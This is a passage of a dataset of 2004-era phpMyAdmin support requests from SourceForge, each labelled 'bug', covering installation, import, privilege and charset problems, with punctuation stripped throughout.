I have tried Excel CVS files and they do not work.
The text file is comma delimited with a semi colon ending each row.
I leave the first column blank for auto increment and everything uploads to phpmyadmin ok even the id is auto incremented.
However, the information does not show in my results when queried.
When I insert on record at a time manually, it shows.
Any ideas?
Original URL https sourceforge.net p phpmyadmin support requests 500 https sourceforge.net p phpmyadmin support requests 500 Original author bufhal2 Found in version 2.5.3 rc1","bug"
"24444","2317","Can t create a new database.
I m trying to create a new database but I keep getting the error saying Access denied for user.
Original URL https sourceforge.net p phpmyadmin support requests 501 https sourceforge.net p phpmyadmin support requests 501 Original author creepa","bug"
"24444","2318","Creating a Table Error 404.
Hello, When I fill out the form that asks Table name and number of fields , and hit the go button, I expect to be sent to a blank table ready for me to insert data.
Instead, I am sent to a page that has this message... Error 404 File not found.
What can I do to solve this problem?
I am stuck!
Can you help?
Thanks, Elrod Original URL https sourceforge.net p phpmyadmin support requests 502 https sourceforge.net p phpmyadmin support requests 502 Original author elrods Found in version 2.5.3","bug"
"24444","2319","PNG images not rendered by IE.
Using the latest 2.5.7 pl download none of the PNG images included in the downloads display in MS Internet Explorer.
The image files themselves are fine, Mozilla Firefox displays the images with no problems.
The images need to be converted back to .gif format or an IE compatible png format, if there is such a thing) for compatibility with MS Internet Explorer.
Original URL https sourceforge.net p phpmyadmin support requests 503 https sourceforge.net p phpmyadmin support requests 503 Original author jerme","bug"
"24444","2320","Problems exporting database.
I have just upgraded to phpMyAdmin 2.5.7 pl1 and every time I attempt to export my MySQL database to back it up I get the following error Action canceled Internet Explorer was unable to link to the Web page you requested.
The page might be temporarily unavailable.
Any help on this problem would be appreciated, Thank you Original URL https sourceforge.net p phpmyadmin support requests 504 https sourceforge.net p phpmyadmin support requests 504 Original author anonymous Found in version 2.5.7","bug"
"24444","2321",".txt file issue.
Hello; I have been using myphpadmin to upload files to a MySQL database.
When I Insert one record at a time, my web page dropdown menu querys work.
But when I upload a .txt file although the file appears to upload ok, the webpage querys will not work.
My hosting co mentions this advice [Quote]The problem is in the inappropriate input file format the txt file) there are spaces before and after the comas.
To solve the problem please strip the spaces arround the comas.
We do not support user script means we would not debug scripts writen from you or any third party company.
Please refer to the script author for support.
[ Quote] Is this something I can put in my code so I do not have to format the .txt file?
Any help is appreciated.
Original URL https sourceforge.net p phpmyadmin support requests 505 https sourceforge.net p phpmyadmin support requests 505 Original author bufhal2 Found in version 2.5.3 rc1","bug"
"24444","2322","PmaAbsoluteUri is correct Still can t create a table.
Lem, I checked everything in the config folder of phpMyAdmin 2.5.3 and everything is correct.
I can get into phpMyAdmin but after I click on the database that I have set up with my web hosting service, I go to a page that says this....
Create New Table.
When I enter the table name and the number of fields and then hit the go button, I get sent to a page that says this.....Error 404 File not found.
I was expecting to see a blank table waiting for me to put data into it.
When I see that message I am thinking to myself, of course the file can t be found, I am trying to set it up now.
It seems like the php is putting the carriage before the horse on this one.
I connected to my database server through DreamweaverMX and thought that I may be able to create the table there and then just upload it to my database that way, but it only lets me upload it to my remote web server.
I ve been stumped on this issue for three weeks.
Is this a common problem with php users?
Thanks, elrods) Original URL https sourceforge.net p phpmyadmin support requests 507 https sourceforge.net p phpmyadmin support requests 507 Original author elrods Found in version 2.5.3","bug"
"24444","2323","edit row produces blank page.
When trying to edit a row in PHPmyAdmin 2.5.5pl1 I m receiving a blank page other than the top header)....
I know that is seem to be text field causing the trouble.
Seems when I ve added a lt;IMG gt; tag and go back to edit the row produces the blank page.
any ideas why?
thanks macx5 hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 506 https sourceforge.net p phpmyadmin support requests 506 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","2324","PmaAbsoluteUri info.
Lem, Attached is the info.
you need to look at the problem I am having.
I will email you the information about what I type in to get onto phpMyAdmin.
Thanks again.
Elrods Original URL https sourceforge.net p phpmyadmin support requests 508 https sourceforge.net p phpmyadmin support requests 508 Original author elrods Found in version 2.5.3","bug"
"24444","2325","PHPmyadmin login failure.
We recently had some problems with our mysql server.
The etc my.cnf file was deleted and we had to restore it.
After this, we began having the problem of loging into PHPmyadmin.
For an example of what i mean visit http 67.18.44.20 2086 3rdparty phpMyAdmin index.php The login prompt does not appear and and it says Wrong username password.
Access denied.
If you have any idea as to why this is happening, we need help asap.
My msn is hayes axlenetworks.com and my email is hayes latech.edu Thanks noah Original URL https sourceforge.net p phpmyadmin support requests 509 https sourceforge.net p phpmyadmin support requests 509 Original author anonymous","bug"
"24444","2326","Tables.
Marc, Hi, I did finally figure out my problem for getting tables up on phpMyAdmin.
However, I use DreamweaverMX and I was expecting the tables on phpMyAdmin to look like a table that you would create in Dreamweaver....However, they don t look anything alike.
Is there a book or something I can reference to help me understand how to enter data into phpMyAdmin tables.
I am used to the standard Row=records horizontal Field=column vertical I was expecting to be able to specify the amount of Rows and Fields that I wanted and then just enter in the data.
Thanks again, Elrods Original URL https sourceforge.net p phpmyadmin support requests 510 https sourceforge.net p phpmyadmin support requests 510 Original author elrods Found in version 2.5.3","bug"
"24444","2327","PDF version of Docs.
Is there a way to get a PDF version of your documentation?
Please email it or a link) to brady.k gmail.com Thanks Original URL https sourceforge.net p phpmyadmin support requests 511 https sourceforge.net p phpmyadmin support requests 511 Original author anonymous","bug"
"24444","2328","navigation shows all databases.
I upgraded 2.3.0 to 2.5.7 pl1, authentication cookie , and now all users get all databases shown on the left.
They don t show any tables and there s no chance to add tables to them etc., but these databases shouldn t show at all.
Only the databases the user has select rights to should show.
I checked the documentation and the bugtracker and also some forums, but can t find anything on that.
Per the documentation phpMyAdmin needs a controluser that has only the SELECT privilege on the mysql.user all columns except Password ), mysql.db all columns), mysql.host all columns) and mysql.tables priv all columns except Grantor Timestamp ) tables.
That s exactly what I have, except for the fact that he doesn t have any privileges for mysql.host.
But even that user, when logged in, can show databases.
I tested on the command line and it works from mysql as well.
So, this is not a problem created in PHPMyAdmin.
There doesn t seem to be a way in MySQL to prevent this, although show databases is not granted, but earlier PHPMyAdmin versions catered for this problem and removed all other databases from display.
PHP 4.3.3, MySQL 4.0.15.
Original URL https sourceforge.net p phpmyadmin support requests 512 https sourceforge.net p phpmyadmin support requests 512 Original author kai schaetzl Found in version 2.5.7 pl1","bug"
"24444","2329","2.6.0 beta2) Inconsistant Ordering of Table List.
Hello everyone, I was just working on my new website and I ve noticed a small bug morelike in my version of phpMyAdmin 2.6.0 beta2.
It s with the database table ordering, it mixes them up in one order on the left hand side, and in another order when you re looking at all your database tables on the one page.
The left side shows hcl canned hcl chat hcl departments hcl faqs hcl files hcl followups hcl footprints hcl hotpages hcl icons hcl jobs hcl keywords hcl notes hcl operators hcl reminders hcl responses hcl session hcl sounds hcl stats hcl system hcl tickets hcl topics hcl traffic hcl transcripts hcl users h emails h faqs o stats o visitors Where the main page that shows all of the tables is showing h emails h faqs hcl canned hcl chat hcl departments hcl faqs hcl files hcl followups hcl footprints hcl hotpages hcl icons hcl jobs hcl keywords hcl notes hcl operators hcl reminders hcl responses hcl session hcl sounds hcl stats hcl system hcl tickets hcl topics hcl traffic hcl transcripts hcl users o stats o visitors Maybe you should sort this out as it looks like a simple thing to fix but may bother some people. )
Best of luck to all of you, Mike Sadowski.
Original URL https sourceforge.net p phpmyadmin support requests 513 https sourceforge.net p phpmyadmin support requests 513 Original author izcool","bug"
"24444","2330","Cannot browse or Search etc.... Hi.
We are running phpmyadmin version 2.5.7 pl1.
Yesterday, the program was working fine, we were able to perform all functions with the database.
Yesterday we upgraded from MySql 4.0.18 to 4.0.20 Max, via RPM.
After doing this, we are able to access the database view tablelist etc), but when we try to use any function that points to sql.php , we get in Internet Explorer) a Action Canceled message in the right pane.
So we cannot, search, browse the tables etc.
The weird thing is, that the version of Phpmyadmin, that is bundled with Plesk 7 also on our Fedora Core 1 Server), works just fine with no problems at all.
However, 2.57 , and even 2.6 Beta 2 stop working for the aforementioned problem.
We are running Php 4.38 , Client API version MYSQL) 3.23.58, MySQL 4.0.20 Max.
I really hope you can advise on this ) Thanks, Simon Original URL https sourceforge.net p phpmyadmin support requests 514 https sourceforge.net p phpmyadmin support requests 514 Original author simon9999","bug"
"24444","2331","Double query on insertion updation.
When I run any query like insert update alter.
Its running these queries twice, whcih results in error.
is it due to some configuration.
But previously it was working fine.
Please help me!
regards, Narender Poonia Original URL https sourceforge.net p phpmyadmin support requests 516 https sourceforge.net p phpmyadmin support requests 516 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","2332","Cannot access tool after installation.
Just completed new installation and believe I completed the configuration per the instructions.
However, when I try to access the admin site via IE 6, I get the following error Warning Cannot modify header information headers already sent by output started at home onsitepi public html gallery phpmyadmin config .inc.php 2) in home onsitepi public html gallery phpmyadmin index.p hp on line 42 Did I miss something?
Original URL https sourceforge.net p phpmyadmin support requests 515 https sourceforge.net p phpmyadmin support requests 515 Original author sportshot Found in version 2.5.7 pl1","bug"
"24444","2333","Template DB TABLE don t work!!!.
For URL ... server export.php?lang=en iso 8859 1 server=1 templates DB and TABLE don t work!!!
For URL ... db details export.php?lang=en iso 8859 1 server=1 db=forum goto=db details export.php template TABLE don t work!!!
Original URL https sourceforge.net p phpmyadmin support requests 517 https sourceforge.net p phpmyadmin support requests 517 Original author makc666 Found in version 2.5.7 pl1","bug"
"24444","2334","It sees the database, then freezes up.
Just installed phpMyAdmin onto server, I can get the welcome screen after 2 3 minutes, I can see my database from the left Select a Database drop down.
After another 2 3 minutes it says there are no tables which is true, I would love to get to the point where I can make a table, but the connection is lost at this point, none of the pages ever reload and I get disconnect from the remote host.
I don t actually get any error messages, I do see the welcome screen and my database.
I don t know where the problem would be?
Any guidance would be appreciated.
Original URL https sourceforge.net p phpmyadmin support requests 518 https sourceforge.net p phpmyadmin support requests 518 Original author anonymous Found in version 2.5.6","bug"
"24444","2335","Deleteing a group of lines.
Hello, I have been adding in inventory to my database and now I have discovered I have several hundred wrong items in the database.
I go to the view products, and I can check the box next to each one and hit delete but that will take me for ever.
I m sure there is a way to select them and delete them, but I want some expert advice before I attemp.
Here is what I was planning on trying selecting a search query, as they all have the same error, then should I press the empty or drop tab ??
If I hit the empty it askes if I m sure I want to truncate.
If its going to truncate just my selection then great, but i dont want to truncate numbers just off the top or bottom of the file.
??
If I press the drop tab, its just asks do I want to Drop table products.??
could some one help with this.
I just want to delete my query selection.
Thanks in advance, Joe joes1 jas 1.com Original URL https sourceforge.net p phpmyadmin support requests 519 https sourceforge.net p phpmyadmin support requests 519 Original author anonymous","bug"
"24444","2336","Plain, basic interface without unnecessary distracting icons.
About phpMyAdmin 2.6.0 beta2 Is it possible to include working, simple and plain interface without any useless icons and flashy colors?
I find new interfaces hard to use and distracting.
phpMyAdmin 2.1.x had working and plain interface which was easy to use.
Text links instead icons are more simple to use and they are more clear, especially when doing mission critical tasks with phpMyAdmin.
You should at least provide option to remove all unnecessary icons and replace them with text links.
Also new original theme does not have visible database dropdown list on Konqueror 3.2.2.
I have to select darkblue orange to get even HALF of dropdown list visible.
Bad design and poor usability!
Original URL https sourceforge.net p phpmyadmin support requests 520 https sourceforge.net p phpmyadmin support requests 520 Original author anonymous","bug"
"24444","2337","SQL and PHP installed on diff computer.
where do I login?.
SQL and PHP installed on diff computer, and the database is running on that computer; however, I have managed to login to the database from a different location over the internet before.
I am pretty sure that I didn t have to install anything on that computer in order to access the database, but am no longer sure.
If it is possible to access it online, without downloading and installing anything where do I go to login?
Otherwise, what is the easiest way to go about this?
I have to get into a database in order to change some field information and perhaps create or drop some fields, but nothing too major.
Please help!!!
Original URL https sourceforge.net p phpmyadmin support requests 521 https sourceforge.net p phpmyadmin support requests 521 Original author spiritvw","bug"
"24444","2338","select all link for dump page.
Hi, i would like to know why there is no JS link Check All Uncheck All when we do a request like select from table wich appears on the page read dump.php) this link appears only on db details structure.php it s a veryusefull function.
my version phpMyAdmin 2.5.6 Thank you, for your great soft Original URL https sourceforge.net p phpmyadmin support requests 522 https sourceforge.net p phpmyadmin support requests 522 Original author veryfree Found in version 2.5.6","bug"
"24444","2339","No Privileges to create DB with root.
When loggued as root, I can t Create DB or Reload MySQL from the home of phpMyAdmin.
But I can still Create DB or Reload in SQL mode.
I have this problem with some older version of phpMyAdmin with php 4.3.x 5.0.x and mySQL 4.0 4.1 on Windows 2000 Server Windows 2003 Server Debian Woody.
PMA user have been granted with corrects right as explain in documentation).
The bug appear after a Reload of mySQL or a service restart.
Sometimes after a flush privilege the right of create DB and reload are OK on phpMyAdmin home page.
Original URL https sourceforge.net p phpmyadmin support requests 523 https sourceforge.net p phpmyadmin support requests 523 Original author smoofy","bug"
"24444","2340","phpMyAdmin Missing db .
Hello, I have phpMyAdmin 2.5.7 pl1, MySQL 4.0.18 nt and PHP 4.3.4 running on Apache 2.0 OS Windows XP.
I have been out of this stuff for a while, but a few years ago used PHP, MySQL and phpMyAdmin without any problems at all.
Now, I have only a few strands of hair left...
I am sure I am forgetting something basic and simple, but if anyone can help me out I and my hair would greatly appreciate it.
I have searched forums and used google to try and come up with an answer but to no avail.
PhpMyAdmin, seems to be running fine, but the frame on the left which allows one to select a database does not seem to do what it is suppose to, it does list databases I have but when I select one from the drop down menu it does nothing.
That is a minor porblem...
I am also logged in as root with full permissions, but when I try to create a database with phpMyAdmin I get the following Server Localhost db create.php Missing db I can create a database using the command line in MySQL, but phpMyAdmin does not seem to do anything aside from letting me see the databases, I even tried to drop one but it again did nothing.
Original URL https sourceforge.net p phpmyadmin support requests 524 https sourceforge.net p phpmyadmin support requests 524 Original author kpm800 Found in version 2.5.7 pl1","bug"
"24444","2341","Underscore shows as question in 2.6.0 rc1.
When I log into phpMyAdmin as a user called egw dev there is the new database field which is automatically filled with egw?dev .
I assume it should be egw dev.
Original URL https sourceforge.net p phpmyadmin support requests 525 https sourceforge.net p phpmyadmin support requests 525 Original author azurazu","bug"
"24444","2342","Wrong querywindow behavior with certain Firefox Config.
Hi.
My System is as follow win XP Firefox 0.9.3 Firefox Extensions miniT, undoclosetab and Tabbrowser Preferences.
I set is up to use single browser mode, meaning it opens every new window except for JS popups in a new tab.
Now comes the Problem When i submit a query in the query window it is executed directly in the querywindow and not in the main frame of PMA.
Original URL https sourceforge.net p phpmyadmin support requests 526 https sourceforge.net p phpmyadmin support requests 526 Original author swatinem Found in version Latest Git snapshot","bug"
"24444","2343","none.
I used this php package to install on my system... i had problems with the isapi package from php so im back to the cgi portion of PHP php cgi.exe) PHP 5.0.0 installer [2,235Kb] 26 July 2004 CGI only, packaged as Windows installer to install and configure PHP, and automatically configure IIS, PWS and Xitami, with manual configuration for other servers.
N.B.
no external extensions included It works fine... as the test page outputs the correct php page.
i also setup MySQL database 4.0.20a nt that works fine too.
I installed PHP to make use of the mysql database thrue phpmyadmin.
When i try phpadmin it gives the messages; cannot load MySQL extension, please check PHP Configuration.
Documentation So how do i load the mysql extenstion thrue php.ini in system dir to work with php cgi.exe ?
When i tried to load the php mysql.dll with php.ini wich is provided with the isapi package of php it gives an error loading ... Php startup mysql unable to initialize module.
Module compiled with module Api=20040718 , debug = o , thread safety =1 PHP compiled with module Api=20040412 , debug = o, thread safety =1 these options need to match.
p.s.
i tried the isapi install earlier but that gave numerous errors, so am back at the php cgi.exe) So question is.. how do i load a mysql extension to work with php cgi.exe , so i could use phpmyadmin.
wich relies on the mysql extention.
Or.. how do i make phpmyadmin work with php cgi.exe and MySQL.
Furtheron it shoud work with phpnuke too.
thanks, Bernhard.
Original URL https sourceforge.net p phpmyadmin support requests 527 https sourceforge.net p phpmyadmin support requests 527 Original author anonymous","bug"
"24444","2344","Why I requested LIKE to not be the default option..
Thanks for sending my request to not have LIKE as being the default option for varchar fields.
But I wanted to explain my self a little bit.
Let s say you have on just one server over 400 gigs of mysql data.
And that mysql server is pushing, Queries per second avg 2424.558.
And you have tables that range in size from 10k to 40gigs.
And row counts that in some tables that are over 500 million rows.
And if you were to do a LIKE on ANY field, you would be looking to fire somebody!
First of all with LIKE blabla , it at least uses an index.
With LIKE bla mysql doesn t use an index at all.
That is the biggest problem with using the double .
Speed is another issue.
Here s an example I just ran.
mysql gt; select count ) from WordSearch; | count ) | | 244389773 | 1 row in set 0.00 sec) Yes, 244 million rows.
My 500 million row tables I can t lockup for any length of time.
mysql gt; select sum words) from WordSearch where word id = 1991; | sum words) | | 1311 | 1 row in set 0.10 sec) mysql gt; select sum words) from WordSearch where word id like 1991 ; | sum words) | | 163961 | 1 row in set 6 min 3.14 sec) .10 seconds, versus 6 minutes.
Now for people who use mysql for their blog site that gets 5 hits a day or something running a 6 minute query is no big deal.
But for somebody like myself who has the mysql slow query log set to 1 second and I get emailed whenever a query runs for longer than 1 second.
I was just asking for a flag in the config file, right now I have to search for the option box and manually change it every time I upgrade which is everytime phpmyadmin comes out with a new version.
Hope this helps you to understand my point.
Donny Original URL https sourceforge.net p phpmyadmin support requests 528 https sourceforge.net p phpmyadmin support requests 528 Original author donsimon","bug"
"24444","2345","Problems after installing XP SP2.
After I have installed the Windows XP Professional Servicepack 2 i can t export the data in a simple text file.
If I select GZip Compression it works fine!
Original URL https sourceforge.net p phpmyadmin support requests 529 https sourceforge.net p phpmyadmin support requests 529 Original author blacky1707","bug"
"24444","2346","error SQL query set name utf8; 1115 unknown character set.
I recently installed phpMyAdmin 2.6.0 rc1 on to my windows XP OS system.
I have MySQL 4.1, Php 4.3 and Apache 2.0.
I unzipped the file in the Apache htdocs file and followed the instructions on modifying the config.inc.php file.
I can view the list of files under the phpMyAdmin main file in my browser Netscape 7.1), but when I try to start a program such as the index.php, main.php or any other php file, I get a blank page with the following message SQL query SET NAMES utf8; MySQL said 1115 Unknown character set utf8 I have reviewed the config and global files within php and mysql, but I cannot figure out where this query is coming from.
Help!!
Thanks.
czorro Original URL https sourceforge.net p phpmyadmin support requests 530 https sourceforge.net p phpmyadmin support requests 530 Original author czorro Found in version 2.6.0 rc1","bug"
"24444","2347","No Privileges Under Create New Database.
phpMyAdmin 2.5.7 MySQL 4.0.18 When logging in as root I am getting No Privileges under Create New Database.
However, I can execute the SQL Statement CREATE DATABASE dbname and create the database without any issues.
This is happening on two seperate servers of mine.
One on a Windows 2000 server, and the other on FreeBSD 5.2 RELEASE p8.
For both I am using Cookie authentication.
This did not occur on 2.5.4 with the same configuration, but once I upgraded to 2.5.7 it started to occur.
I have checked permissions for both root localhost and root to make sure they are setup with all permissions, and they are.
I have attempted to Google, and search the support forums for a fix to this, and all I see are check perms , you re not doing it right , but no solutions to the issue.
What doesn t make any since here, is that nothing changed besides the version.
I m using the exact same database, and the same config options in config.inc.php on both of these servers.
Thanks, Damien H. Original URL https sourceforge.net p phpmyadmin support requests 531 https sourceforge.net p phpmyadmin support requests 531 Original author xanie Found in version 2.5.7","bug"
"24444","2348","Can t connect to localhost when using MySQLi.
Hi, On my current setup Windows XP, PHP 5.0.0, MySQL 4.1.2), I found that authentication won t work when the skip networking option is set in my.cnf and phpMyAdmin is using the mysqli extension to connect.
It works fine if I change to the old mysql extension or re enable networking in MySQL.
I m aware of the notice saying there s a known HTTP auth problem but this seems like a different one it happens using the other auth types as well which gives a 2003 Can t connect to MySQL server on localhost 10061) error.
anthony.parsons manx.net Original URL https sourceforge.net p phpmyadmin support requests 532 https sourceforge.net p phpmyadmin support requests 532 Original author anonymous","bug"
"24444","2349","Index.php shows up as a blank page during installation..
I am attempting to install phpmyadmin on Apache 1.3.31 web server, with PHP5 and Mysql4.
I m not sure if it matters but my OS is Windows XP) I m not sure where or how I want wrong during the installation, seeing as there are only four steps, but somewhere I did I supppose.
My problem is that, after configuring config.inc.php, when I go to www.myweb.net pma index.php, all I get as a blank page.
The only hint that anything worked was that the title of the page says Phpmyadmin version.....
I followed the direction in the documentation exactly.
I unzipped PMA to my webfolder, in a directory called pma.
I then configured config.inc.php, putting in my PMA address www.myweb.net pma ), host localhost), username and password.
I double checked mysql before installation to make sure that the user and pass were working, and they are.)
My authority type was config, of course, because I am new and don t want to try out non default things until I have more experience.
Anyway when I boot up MSIE, and go to http www.myweb.net pma index.php, all I get is a blank page and this as my title phpMyAdmin 2.6.0 rc1 www.myweb.net Microsoft Internet Explorer.
What did I do wrong?
Original URL https sourceforge.net p phpmyadmin support requests 533 https sourceforge.net p phpmyadmin support requests 533 Original author anonymous Found in version 2.6.0 rc1","bug"
"24444","2350","No right to create db if no pma localhost.
I connect to mysql with user pma somehost.
User pma somehost is ok.
But if the user pma localhost not exist in the privilege table the rights of create db are not detected properly.
Tested with phpmyadmin 2.6.0 rc1 mysql 4.1 php 4.3.8 Original URL https sourceforge.net p phpmyadmin support requests 534 https sourceforge.net p phpmyadmin support requests 534 Original author smoofy Found in version 2.6.0 rc1","bug"
"24444","2351","DNS address changed, cannot access Db s. How Do I change my DNS address that phpmyadmin is expecting to use so that I can access everything again Original URL https sourceforge.net p phpmyadmin support requests 535 https sourceforge.net p phpmyadmin support requests 535 Original author anonymous","bug"
"24444","2352","left frame blank when selecting database w >87 tables.
Have researched my prolem and my humble conclusion is.
Not Client related OS2 win2k IE Mozilla Firefox version 2.5.7 2.6.0 various releases all affected Opening frame in new window does produce correct results but using windows instead of frames isn t doing usability a lot of good.
Database is correct, other applications phpnuke) have no problem with it.
No errors from Apache PHP MySQL phpinfo can be checked at http suzy.geurts.homeip.net 2 screen shots are also available from the same site.
Regards, Djerk Geurts mailto d.m.geurts geurtscass.com Original URL https sourceforge.net p phpmyadmin support requests 536 https sourceforge.net p phpmyadmin support requests 536 Original author anonymous","bug"
"24444","2353","directory you set for upload work cannot be reached .
This error message is displayed in the query window, when you select the Import Files tab.
I have tried editing the configuration file and specifying a number of different perm 777 directories for the following configuration options in the config file cfg[ UploadDir ] cfg[ SaveDir ] cfg[ docSQLDir ] I tracked the error down to the following block of code in the tbl query box.php file 383 TODO Add a more complete warning that no items like for file import) where found.
384 After 2.5.2 release!)
385 echo strWebServerUploadDirectoryError; I am not sure what is causing this, or what the comment means.
A possibly relavent difference between previous installs of phpmyadmin and this one is that the absoloute path to the phpmyadmin contains a symbolic link.
Please could someone assist?
Original URL https sourceforge.net p phpmyadmin support requests 537 https sourceforge.net p phpmyadmin support requests 537 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","2354","With network.http.keep alive turned ON in Mozilla, undef.
When connecting to phpmyadmin 2.6.0 rc and 2.5.x) with Mozilla network.http.keep alive turned ON), some users reported getting a lot of notices like this Notice Undefined index BgcolorOne in home xpz public html PHP pMA tbl properties structure.php on line 119 Notice Undefined index BrowsePointerColor in home xpz public html PHP pMA tbl properties structure.php on line 123 Notice Undefined index BrowseMarkerColor in home xpz public html PHP pMA tbl properties structure.php on line 123 Notice Undefined index BrowsePointerColor in home xpz public html PHP pMA tbl properties structure.php on line 124 In the same situation, MS IE and Opera work just fine.
Moreover, with that option turned OFF, Mozilla and Firefox) works fine as well.
It seems like somehow the http traffic perhaps HTTP POST) is truncated and phpmyadmin can t cope with that anomalous condition.
I haven t experienced this bug myself so that I can t give you more details than what I m writting now.
I guess phpmyadmin needs to have a protection mechanism against such a bad input .
Original URL https sourceforge.net p phpmyadmin support requests 538 https sourceforge.net p phpmyadmin support requests 538 Original author jshin","bug"
"24444","2355","mysql system database, phyMyAdmin, myODBC.
Have a semi strange question that hopefully you can point me in the right direction for a solution.
I know that mysql has its own system database with the host, db and user table to name several.
I have just recently started using phpMyAdmin as some members of my organization are not very database literate and the interface is helpful for them.
I created a database and table from within phpMyAdmin and populated the table with some basic data.
I can see the data using phpMyAdmin.
I can go to the server and run mysql and then use database and see the data that is in the table.
However, the database is not listed in the db table when I use mysql as the database.
The problem that I am having is that I need to make a myODBC link to the database for interface with NetObjects.
My guess is that since the database is not listed in the mysql db table that is causing myODBC to fail to connect.
Can I make a manual entry in the mysql db table and if so what impact would that have on operation of the system?
brownmil cci 29palm.com Original URL https sourceforge.net p phpmyadmin support requests 539 https sourceforge.net p phpmyadmin support requests 539 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","2356","clicking on table names causes strange behavoir.
Hi!
When I m clicking on a table name in the left frame to view the table strukture something strange happens only the first part of the page most of the time it stops at after the top menu) is displayed sometimes the right frame reloads all the time This happens too, when I select a database in the dropdown.
I m using Internet Explorer 6.0 SP1 Bye, Jumar Original URL https sourceforge.net p phpmyadmin support requests 540 https sourceforge.net p phpmyadmin support requests 540 Original author jumaris","bug"
"24444","2357","404 error.
When I try to export in XML format I get a 404 page.
I checked the config.inc file and the setting for cfg[ PmaAbsoluteUri ] looks correct.
I have cfg [ PmaAbsoluteUri ] = http www.mysite.com phpmyadmin Does that sound right?
what am I missing here.
Thank you.
ry mills comcast.net Original URL https sourceforge.net p phpmyadmin support requests 541 https sourceforge.net p phpmyadmin support requests 541 Original author anonymous Found in version 2.5.3","bug"
"24444","2358","Getting User sandisun x7 1 has exceeded the max questions.
Getting User sandisun x7 1 has exceeded the max questions resource current value 50000) What does this mean?
I am a newbie and could not figure this out.
Thank You, Webmaster sandisuniquedesign.com Original URL https sourceforge.net p phpmyadmin support requests 542 https sourceforge.net p phpmyadmin support requests 542 Original author anonymous Found in version 2.5.2","bug"
"24444","2359","database list classified.
would be nice to have an array of x type of databases, so that it could be easier choose which one you need.
Original URL https sourceforge.net p phpmyadmin support requests 544 https sourceforge.net p phpmyadmin support requests 544 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","2360","Create Database with UserPrefix.
Good Morning, Is there a simple Way to allow a normal User to Create DB s via the ControlUser Rightselevation) with a fixed Database prefix.
User MytestUser DatabaseSuggestion MyTestUser DatabasePosiblities MyTestUserXXXXXX... X is variable) This would be a fine feature !
cu steini Original URL https sourceforge.net p phpmyadmin support requests 545 https sourceforge.net p phpmyadmin support requests 545 Original author steininet Found in version 2.6.0 rc2","bug"
"24444","2361","search doesn t work anymore.
In all phpmyadmin version above 2.5.5 The problem, when you try to search a table for specific content, using the search option icm with the default limit it won t work.
The default search limit is missing the correct pos value.
.. example query taken from phpMyAdmin SELECT FROM tablename WHERE field1 gt;= 10 LIMIT , 30 it should be SELECT FROM tablename WHERE field1 gt;= 10 LIMIT 0, 30 When I looked at the source file, tbl select.php, I found out the pos variable has been set, but it has been set with null instead of 0.
After some searching, I found that common.lib.php sets the value of pos to 0 if it hasn t been set.
After slightly changing common.lib.php it all works again like a charm.
I think this problem should not have been fixed in common.lib.php for the default limit seems to work everywhere else... Perhaps you all could have a look at it.
Original URL https sourceforge.net p phpmyadmin support requests 546 https sourceforge.net p phpmyadmin support requests 546 Original author pvree","bug"
"24444","2362","Bug in PMA getDbCollation function.
There seems to be a bug in the PMA getDbCollation function in the rc3 release of 2.6.0.
The bug is fairly easy to replicate and fix.
This is the part that is causing problems.
if isset tokenized[ i 5]) tokenized[ i 4] == COLLATE ) \{ return tokenized[ i 5]; We found the collation!
\} else \{ We did not find the collation, so let s return the default collation for the charset we ve found.
return GLOBALS[ mysql default collations ][ tokenized [ i 3]]; \} tokenized is generated by doing a SHOW CREATE DATABASE in 4.1.x.
Which returns, mysql gt; show create database Magic; | Database | Create Database | | Magic | CREATE DATABASE `Magic` !40100 DEFAULT CHARACTER SET latin1 | 1 row in set 0.00 sec) But the code is looking for something called COLLATE .
Which does not exist in 4.1.2, 4.1.3, 4.1.4, and 4.1.5.
If you print out the array of tokenized it looks like this Array [0] = gt; CREATE [1] = gt; DATABASE [2] = gt; `Overture` [3] = gt; !40100 [4] = gt; DEFAULT [5] = gt; CHARACTER [6] = gt; SET [7] = gt; latin1 [8] = gt; ) So the problem part of the function should be changed to something like this.
if isset tokenized[ i 3])) \{ return tokenized[ i 3]; We found the collation!
\} This would probably solve the problem.
Unless I am completely missing something.
Donny Original URL https sourceforge.net p phpmyadmin support requests 547 https sourceforge.net p phpmyadmin support requests 547 Original author donsimon Found in version 2.6.0 rc3","bug"
"24444","2363","Cannot untar phpMyAdmin.
I am getting the following errors trying to unzip the file tar xzf phpMyAdmin 2.5.6.tar.gz gzip stdin not in gzip format tar child returned status 1 tar error exit delayed from previous errors Thanks for any help.
chokk Original URL https sourceforge.net p phpmyadmin support requests 552 https sourceforge.net p phpmyadmin support requests 552 Original author chokk1223 Found in version 2.5.6","bug"
"24444","2364","SQL error 1064 when trying to import data.
I am trying to set up a mini webserver on my computer to reflect the set up I have on my webpages webforums.
I am running Apache 2.0.51 PHP 5.0.1, and installed MySQL 4.0.21 nt, and phpMyAdmin 2.5.7 pl1 to administer it.
This mirrors, as approximately as I can, my webhoster s set up on his server aside from the fact he s running Linux Gentoo, and I m running Win XP Home Edition).
I installed phpBB 2.0.10, which is running fine.
But when I try to import data from my live forum database, which is running MySQL 4.0.20 log, it gives me the following error Database ndp Table phpbb themes running on localhost Error SQL query DATABASE ndp TABLE phpbb themes running ON localhost CREATE TABLE `phpbb themes` `themes id` mediumint 8 ) unsigned NOT NULL AUTO INCREMENT , `template name` varchar 30 ) NOT NULL default , `style name` varchar 30 ) NOT NULL default , `head stylesheet` varchar 100 ) default NULL , `body background` varchar 100 ) default NULL , `body bgcolor` varchar 6 ) default NULL , `body text` varchar 6 ) default NULL , `body link` varchar 6 ) default NULL , `body vlink` varchar 6 ) default NULL , `body alink` varchar 6 ) default NULL , `body hlink` varchar 6 ) default NULL , `tr color1` varchar 6 ) default NULL , `tr color2` varchar 6 ) default NULL , `tr color3` varchar 6 ) default NULL , `tr class1` varchar 25 ) default NULL , `tr class2` varchar 25 ) default NULL , `tr class3` varchar 25 ) default NULL , `th color1` varchar 6 ) default NULL , `th color2` varchar 6 ) default NULL , `th color3` varchar 6 ) default NULL , `th class1` varchar 25 ) default NULL , `th class2` varchar 25 ) default NULL , `th class3` varchar 25 ) default NULL , `td color1` varchar 6 ) default NULL , `td color2` varchar 6 ) default NULL , `td color3` varchar 6 ) default NULL , `td class1` varchar 25 ) default NULL , `td class2` varchar 25 ) default NULL , `td class3` 